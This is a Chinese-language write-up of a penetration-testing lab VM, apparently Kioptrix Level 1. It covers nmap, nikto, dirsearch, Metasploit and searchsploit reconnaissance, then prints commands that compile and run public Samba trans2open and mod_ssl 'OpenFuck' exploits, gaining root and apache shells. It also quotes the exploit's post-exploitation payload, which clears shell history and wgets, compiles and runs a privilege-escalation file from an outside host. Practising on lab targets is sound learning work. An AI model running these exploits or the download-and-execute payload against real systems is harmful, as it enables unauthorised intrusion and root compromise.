靶场搭建
我用的VM17,由于靶场是直接封装好的,直接复制进去没有办法获取到IP地址,需要手动先配置一下
- 不要立即打开,使用记事本打开
VMX文件,删除所有以ethernet0开头的条目并保存 - 修改
VirtualHW.version条目为正确的版本号,如我的17 - 重新导入虚拟机,添加网卡,并修改模式为
NAT
这样就连到虚拟机网络了
IP:192.168.74.133
信息收集
nmap
C:\WINDOWS\system32>nmap -sV 192.168.74.133 -p- -O
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-06 10:58 中国标准时间
Nmap scan report for 192.168.74.133
Host is up (0.00045s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: jMYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:25:FE:E8 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.96 seconds开了ssh,可以尝试爆破
80端口为redhat的测试页面
还开了Samba服务,没有看出具体版本号
试一试常用的Samba漏洞模块usermap_script,没有成功
再扫一扫漏洞
C:\WINDOWS\system32>nmap 192.168.74.133 --script=vuln
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-06 11:09 中国标准时间
Nmap scan report for 192.168.74.133
Host is up (0.0012s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-trace: TRACE is enabled
| http-enum:
| /test.php: Test page
| /icons/: Potentially interesting directory w/ listing on 'apache/1.3.20'
| /manual/: Potentially interesting directory w/ listing on 'apache/1.3.20'
|_ /usage/: Potentially interesting folder
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: CVE:CVE-2014-3566 BID:70574
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_3DES_EDE_CBC_SHA
| References:
| https://www.imperialviolet.org/2014/10/14/poodle.html
| https://www.openssl.org/~bodo/ssl-poodle.pdf
| https://www.securityfocus.com/bid/70574
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_sslv2-drown: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| ssl-ccs-injection:
| VULNERABLE:
| SSL/TLS MITM vulnerability (CCS Injection)
| State: VULNERABLE
| Risk factor: High
| OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
| does not properly restrict processing of ChangeCipherSpec messages,
| which allows man-in-the-middle attackers to trigger use of a zero
| length master key in certain OpenSSL-to-OpenSSL communications, and
| consequently hijack sessions or obtain sensitive information, via
| a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
| http://www.openssl.org/news/secadv_20140605.txt
|_ http://www.cvedetails.com/cve/2014-0224
| ssl-dh-params:
| VULNERABLE:
| Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
| State: VULNERABLE
| IDs: CVE:CVE-2015-4000 BID:74733
| The Transport Layer Security (TLS) protocol contains a flaw that is
| triggered when handling Diffie-Hellman key exchanges defined with
| the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
| to downgrade the security of a TLS session to 512-bit export-grade
| cryptography, which is significantly weaker, allowing the attacker
| to more easily break the encryption and monitor or tamper with
| the encrypted stream.
| Disclosure date: 2015-5-19
| Check results:
| EXPORT-GRADE DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: mod_ssl 2.0.x/512-bit MODP group with safe prime modulus
| Modulus Length: 512
| Generator Length: 8
| Public Key Length: 512
| References:
| https://www.securityfocus.com/bid/74733
| https://weakdh.org
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
|
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_DES_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: mod_ssl 2.0.x/1024-bit MODP group with safe prime modulus
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
1024/tcp open kdm
MAC Address: 00:0C:29:25:FE:E8 (VMware)
Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]
| smb-vuln-cve2009-3103:
| VULNERABLE:
| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
| State: VULNERABLE
| IDs: CVE:CVE-2009-3103
| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
| aka "SMBv2 Negotiation Vulnerability."
|
| Disclosure date: 2009-09-08
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_ http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
Nmap done: 1 IP address (1 host up) scanned in 331.29 seconds看到了CVE-2009-3103,但是OS是Linux不是Windows,所以没有可以利用的漏洞模块
nikto
┌──(root㉿kali)-[~/Desktop]
└─# nikto -h 192.168.74.133
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.74.133
+ Target Hostname: 192.168.74.133
+ Target Port: 80
+ Start Time: 2024-04-05 23:23:21 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ /: Server may leak inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep 5 23:12:46 2001. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ OpenSSL/0.9.6b appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.9.6) (may depend on server version).
+ /: Apache is vulnerable to XSS via the Expect header. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3918
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE .
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution.
+ Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system.
+ Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0835
+ /manual/: Directory indexing found.
+ /manual/: Web server manual found.
+ /icons/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /test.php: This might be interesting.
+ /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.
+ /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.
+ /shell?cat+/etc/hosts: A backdoor was identified.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8908 requests: 0 error(s) and 30 item(s) reported on remote host
+ End Time: 2024-04-05 23:23:46 (GMT-4) (25 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested有一些误报,说存在后门的、远程执行的都验证了下没有的事
CVE是一些XSS,对于靶场来讲没有任何价值
manual目录需要本地127.0.0.1访问,我猜是需要加Hearder才能访问
关于apache的这些漏洞
+ Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution.
+ Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system.
+ Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell.哎我直接去searchsploit里面搜得了
metasploit
nmap没有扫描出来samba具体的版本信息,但是samba是高发区,用metasploit再试试
msf6 auxiliary(scanner/smb/smb_version) > set RHOST 192.168.74.133
RHOST => 192.168.74.133
msf6 auxiliary(scanner/smb/smb_version) > set THREADS 10
THREADS => 10
msf6 auxiliary(scanner/smb/smb_version) > run
[*] 192.168.74.133:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 192.168.74.133:139 - Host could not be identified: Unix (Samba 2.2.1a)
[*] 192.168.74.133: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_version) >看到了版本信息是Samba 2.2.1a
搜一下相应的攻击模块,搜出来6个
看了一下所有的target版本,只有最后一个支持2.2.1a,那么利用一下,他要爆破地址,等等看结果
等了J8十几分钟了没有结果,中间出现过数次session,但是都die了。没辙了
searchsploit
查一下漏洞
samba
┌──(root㉿kali)-[~/Desktop]
└─# searchsploit samba 2.2.1a
------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------- ---------------------------------
Samba 2.2.0 < 2.2.8 (OSX) - trans2open Ove | osx/remote/9924.rb
Samba < 2.2.8 (Linux/BSD) - Remote Code Ex | multiple/remote/10.c
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (P | linux_x86/dos/36741.py
------------------------------------------- ---------------------------------- 第一个在metasploit中已经尝试过了linux版本的了,没弹出来shell,感到困惑,可能是模块不适配新版本的msf了
- 第二个可以尝试进行攻击,测试一下发现是可行的
- 第三个需要OS是不是RedHat
- 第四个拒绝服务攻击没有什么价值
apache
# searchsploit apache 1.3.20
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution | php/remote/29290.c
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner | php/remote/29316.py
Apache 1.3.20 (Win32) - 'PHP.exe' Remote File Disclosure | windows/remote/21204.txt
Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 - Root Directory Access | windows/remote/19975.pl
Apache 1.3.x < 2.0.48 mod_userdir - Remote Users Disclosure | linux/remote/132.c
Apache < 1.3.37/2.0.59/2.2.3 mod_rewrite - Remote Overflow | multiple/remote/2237.sh
Apache < 2.0.64 / < 2.2.21 mod_setenvif - Integer Overflow | linux/dos/41769.txt
Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak | linux/webapps/42745.py
Apache CouchDB < 2.1.0 - Remote Code Execution | linux/webapps/44913.py
Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial of Service | multiple/dos/26710.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1) | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) | unix/remote/47080.c
Apache Struts < 1.3.10 / < 2.3.16.2 - ClassLoader Manipulation Remote Code Execution (Metasploit) | multiple/remote/41690.rb
Apache Struts < 2.2.0 - Remote Command Execution (Metasploit) | multiple/remote/17691.rb
Apache Tika-server < 1.18 - Command Injection | windows/remote/46540.py
Apache Tomcat < 5.5.17 - Remote Directory Listing | multiple/remote/2061.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal | unix/remote/14489.c
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC) | multiple/remote/6229.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (1) | windows/webapps/42953.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2) | jsp/webapps/42966.py
Apache Xerces-C XML Parser < 3.1.2 - Denial of Service (PoC) | linux/dos/36906.txt
Oracle Java JDK/JRE < 1.8.0.131 / Apache Xerces 2.11.0 - 'PDF/Docx' Server Side Denial of Service | php/dos/44057.md
Webfroot Shoutbox < 2.32 (Apache) - Local File Inclusion / Remote Code Execution | linux/remote/34.pl
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
其中有一些是可能适用的,比如linux/remote/132.c,这个查过之后是用来枚举用户的
但是我在这里只需要寻找高价值模块,拿到shell
dirsearch
看到开放了80端口肯定是要扫一下敏感目录
D:\PentestTool\Pentest_ToolBox\Gather_Infomation\dirsearch>dirsearch -u http://192.168.74.133/
dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: D:\PentestTool\Pentest_ToolBox\Gather_Infomation\dirsearch\reports\http_192.168.74.133\__24-04-06_11-08-35.txt
Target: http://192.168.74.133/
[11:08:35] Starting:
[11:08:40] 403 - 275B - /.ht_wsr.txt
[11:08:40] 403 - 278B - /.htaccess.bak1
[11:08:40] 403 - 278B - /.htaccess.orig
[11:08:40] 403 - 278B - /.htaccess.save
[11:08:40] 403 - 280B - /.htaccess.sample
[11:08:40] 403 - 279B - /.htaccess_extra
[11:08:40] 403 - 278B - /.htaccess_orig
[11:08:40] 403 - 276B - /.htaccess_sc
[11:08:40] 403 - 276B - /.htaccessOLD
[11:08:40] 403 - 277B - /.htaccessOLD2
[11:08:40] 403 - 276B - /.htaccessBAK
[11:08:41] 403 - 268B - /.htm
[11:08:41] 403 - 269B - /.html
[11:08:41] 403 - 278B - /.htpasswd_test
[11:08:41] 403 - 274B - /.htpasswds
[11:08:41] 403 - 275B - /.httr-oauth
[11:09:20] 403 - 272B - /cgi-bin/
[11:09:32] 403 - 268B - /doc/
[11:09:32] 403 - 283B - /doc/en/changes.html
[11:09:32] 403 - 272B - /doc/api/
[11:09:32] 403 - 282B - /doc/stable.version
[11:09:32] 403 - 283B - /doc/html/index.html
[11:10:00] 301 - 294B - /manual -> http://127.0.0.1/manual/
[11:10:05] 200 - 17KB - /mrtg/
[11:11:01] 200 - 27B - /test.php
[11:11:07] 301 - 293B - /usage -> http://127.0.0.1/usage/
[11:11:24] 403 - 273B - /~operator
[11:11:24] 403 - 269B - /~root看到有跳转到127.0.0.1,我们改一下X-Forward-For看一下是什么
usage页面还是会跳转,不知道原因,知道的老哥可以踢我一下。
manual页面就不会跳转了,打开一看是个mod_ssl的文件夹,估计是个提示,结合nikto扫描结果可以知道确定是有一个与此相关的漏洞
漏洞利用
Samba
通过searchsploit查找到有一个RCE可以利用
将exp复制到当前目录下,并使用gcc进行编译
searchsploit -m 10.c
gcc -o exp 10.c编译成功后进行使用
┌──(root㉿kali)-[~/Desktop]
└─# ./exp -b 0 192.168.74.133
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
whoami
root拿下root权限
apache
apache漏洞在metasploit中搜了一下,没找到合适的攻击方式
去searchsploit中搜了一下有一些,尝试利用
先安装OpenSSL库:apt-get install libssl-dev
将源码进行编译,三个mod_ssl的只编译出来一个47080一个
┌──(root㉿kali)-[~/Desktop]
└─# gcc -o 47080 47080.c -lcrypto┌──(root㉿kali)-[~/Desktop]
└─# ./47080 0x6b 192.168.74.133
*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80fc098
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo
--01:14:38-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
Unable to establish SSL connection.
Unable to establish SSL connection.
gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
bash: ./exploit: No such file or directory
bash-2.05$
bash-2.05$ whoami
whoami
apache拿到了apache权限
至于为什么是apache用户呢?因为它里面加载的payload是需要连接外部网络下载模块进行编译后才能提权,但是由于GFW的原因下载不下来,所以就没有办法进行提权。我们可以尝试手动上传上去之后进行提权,或者直接不用他这个payload,尝试别的方法进行。
提权模块的下载地址:https://dl.packetstormsecurity.net/0-exploits/ptrace-kmod.c
原payload:
unset HISTFILE; cd /tmp; wget https://dl.packetstormsecurity.net/0-exploits/ptrace-kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-d.c; ./exploit;通过提权就可拿到root权限。
小结
靶场打的还是有一些混乱没有章法,主要是我想要组成windows的工具包,在win下和kali下的攻击模式还是有一些差异。
通过信息收集的结果没有进行汇总,总是想到哪里做到哪里,这个方法一定是存在问题的。
跟编程相关的漏洞执行能力太差劲,没有办法自己编写漏洞脚本,甚至看懂也不太行,这方面做的太少了,要加强编程能力。提高工具数量度。
对于这种攻击模式还是太过陌生了。
在之后的靶场练习当中,争取将首次信息收集环节和漏洞利用环节完全分隔开,,在信息收集完成后,做一次汇总先。
这些靶场实在是不适合win下进行,还是使用kali进行舒服些,之后还是切到kali上作为主要环境吧。